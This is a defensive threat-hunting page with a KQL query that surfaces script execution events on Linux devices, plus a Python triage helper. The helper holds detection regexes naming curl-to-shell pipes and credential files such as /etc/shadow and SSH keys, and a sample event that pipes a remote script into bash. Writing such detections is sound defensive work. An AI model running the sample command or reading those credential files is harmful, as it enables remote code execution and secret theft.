
Linux Script Activity Script Content

Query

## Linux – Script Activity (ScriptContent) – Last 24h

### Purpose

High-signal query for **script-based execution**, one of the most common Linux attack techniques.

### Query

```kql
let LinuxDeviceIds =
    DeviceInfo
    | where OSPlatform == "Linux"
    | distinct DeviceId;
DeviceEvents
| where Timestamp > ago(24h)
| where DeviceId in (LinuxDeviceIds)
| where ActionType == "ScriptContent"
| project
    Timestamp,
    DeviceName,
    FileName,
    FolderPath,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine,
    AdditionalFields,
    ReportId
| order by Timestamp desc
```

### Use this for

* Detecting `curl | bash` patterns
* Identifying inline or downloaded scripts
* Investigating admin misuse or credential harvesting scripts
* Understanding attacker intent (script logic is often exposed)

### Typical activity you’ll see

* Shell scripts executed by `bash`
* Scripts dropped to `/tmp`
* Inline script execution via CLI tools

Explanation

This query is designed to monitor and detect script-based activities on Linux devices over the past 24 hours, which is a common method used in Linux attacks. Here's a simplified breakdown of what the query does:

  1. Identify Linux Devices: It first identifies all devices running Linux by checking the operating system platform in the DeviceInfo table and collects their unique identifiers (DeviceId).

  2. Filter Recent Script Activities: It then looks into the DeviceEvents table to find events from the last 24 hours (Timestamp > ago(24h)) that are related to script execution (ActionType == "ScriptContent").

  3. Focus on Linux Devices: The query ensures that it only considers events from the Linux devices identified earlier.

  4. Extract Relevant Information: For each relevant event, it extracts details such as the time of the event, device name, file and folder paths, the process that initiated the script, and any additional fields or report IDs.

  5. Order by Time: Finally, it sorts these events in descending order based on the timestamp, so the most recent activities appear first.

This query is useful for detecting patterns like curl | bash, identifying scripts that are either inline or downloaded, investigating potential misuse by administrators, and understanding the intent of attackers by analyzing the logic exposed in scripts. Typical activities detected might include shell scripts executed by bash, scripts placed in temporary directories like /tmp, and inline script execution using command-line tools.
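As an added illustration (not part of the original query or the author's page), the triage the projected columns support, written in Python against constructed rows shaped like the query output: it pulls the script body out of `AdditionalFields` (assuming, as this example does, that the key is named `ScriptContent`) and flags the `curl | bash` and `/tmp` patterns listed above, most recent event first.

```python
import json
import re

# Assumption for this example: for ActionType == "ScriptContent" the script body
# is carried inside AdditionalFields under a key named "ScriptContent".
SCRIPT_KEY = "ScriptContent"

# Each pattern is paired with the reason it matters to a defender.
PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"), "remote script piped to shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "encoded payload decoded at runtime"),
    (re.compile(r"/etc/shadow|\.ssh/id_|\.bash_history"), "credential or secret file access"),
]
TEMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")


def triage_event(event: dict) -> dict:
    """Return the event enriched with the parsed script text and a list of findings."""
    fields = event.get("AdditionalFields") or "{}"
    if isinstance(fields, str):          # exported rows carry the dynamic column as JSON text
        fields = json.loads(fields)
    script = fields.get(SCRIPT_KEY, "")
    findings = [reason for rx, reason in PATTERNS if rx.search(script)]
    folder = event.get("FolderPath") or ""
    if any(folder.startswith(d) for d in TEMP_DIRS):
        findings.append("script located in a world-writable temp directory")
    return {**event, "ScriptContent": script, "Findings": findings}


def triage_events(events):
    """Triage every row and sort newest first, mirroring `order by Timestamp desc`."""
    rows = [triage_event(e) for e in events]
    return sorted(rows, key=lambda r: r["Timestamp"], reverse=True)


# Constructed sample rows in the shape the query projects (not real telemetry).
SAMPLE_EVENTS = [
    {"Timestamp": "2026-02-01T10:00:00Z", "DeviceName": "web01", "FileName": "install.sh",
     "FolderPath": "/tmp/install.sh", "InitiatingProcessFileName": "bash",
     "AdditionalFields": json.dumps({"ScriptContent": "curl -s http://example.invalid/x.sh | bash"})},
    {"Timestamp": "2026-02-01T11:30:00Z", "DeviceName": "db02", "FileName": "backup.sh",
     "FolderPath": "/opt/scripts/backup.sh", "InitiatingProcessFileName": "bash",
     "AdditionalFields": json.dumps({"ScriptContent": "#!/bin/bash\ntar czf /backup/db.tgz /var/lib/db"})},
]

if __name__ == "__main__":
    for row in triage_events(SAMPLE_EVENTS):
        print(row["Timestamp"], row["DeviceName"], row["FileName"], row["Findings"])
```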

Details


Nathan Hutchinson

Released: February 2, 2026

Tables

DeviceInfo, DeviceEvents

Keywords

Linux, Devices, DeviceInfo, DeviceEvents, Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, AdditionalFields, ReportId

Operators

let, where, distinct, in, project, order by, ago
